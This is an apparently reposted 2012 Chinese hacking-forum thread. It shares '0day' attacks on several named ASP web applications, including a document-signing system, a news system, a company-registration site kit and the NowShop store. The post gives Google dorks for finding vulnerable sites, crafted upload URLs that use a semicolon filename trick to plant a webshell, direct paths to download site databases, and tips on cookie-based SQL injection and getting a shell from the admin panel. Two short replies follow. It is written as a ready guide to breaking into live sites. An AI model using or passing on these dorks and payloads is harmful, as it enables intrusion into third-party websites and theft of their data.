tianyueabc 发表于 2012-7-13 13:46:45

大家赶紧的多个0day (下)---转载

本帖最后由 tianyueabc 于 2012-7-13 13:54 编辑

网纪互联公文签收系统司法版通杀上传漏洞

网纪互联公文签收系统司法版通杀上传漏洞
google搜索:inurl:qtdisp.asp?disp_id=
源码根目录漏洞文件in_file.asp 可以自定文件
漏洞文件:in_file.asp
构造语句:in_file.asp?file_name=yueyan.asp;
上我们的图片jpg格式木马
webshell 路径为:upfile/yueyan.asp;.jpg
漏洞分析:同这个0day差不多,原理相同


某新闻发布系统漏洞
无意发现一个站有注入 然后找下关键字发现是某套程序然后找了下关键字
关键字:inurl:onews.asp?id=
有些是加入了防注入代码 但大部分都没过滤cookies 可以注入中转下。
php的注入漏洞和上传是非常好挖的,只要你在拿站是多留意下建站系统呀,getshell方法呀。。。。
多注意就会发现,有很多漏洞都是通用的。
中国是山寨大国,这些建站系统都是这个抄袭哪个,哪个抄袭这个的,瞬间无语了。,
康城公司注册类网站系统
康城公司注册类网站系统 v9.6
关键字:inurl:company.asp?title=
数据库:Databases/kangchengiop.mdb
或者Databases/kangcheng.mdb
cookies 注入中转
后台拿shell
cookies 名小子 可以上传
ewe 修改样式
数据库备份
插一句 建议不使用!!

NowShop商城系统上传0day

上传页面:admin/upload.asp
上传语句构造:admin/upload.asp?fuptype=db&fupname=yueyan.asp;&frmname=yueyan.asp
本地上传:yueyan.jpg
具体就不说明了。。。

hntc007 发表于 2012-7-18 11:31:34

学习中,还不知道怎么用。。

蓝颜 发表于 2013-10-21 20:45:15

支持 了、   
页: [1]
查看完整版本: 大家赶紧的多个0day (下)---转载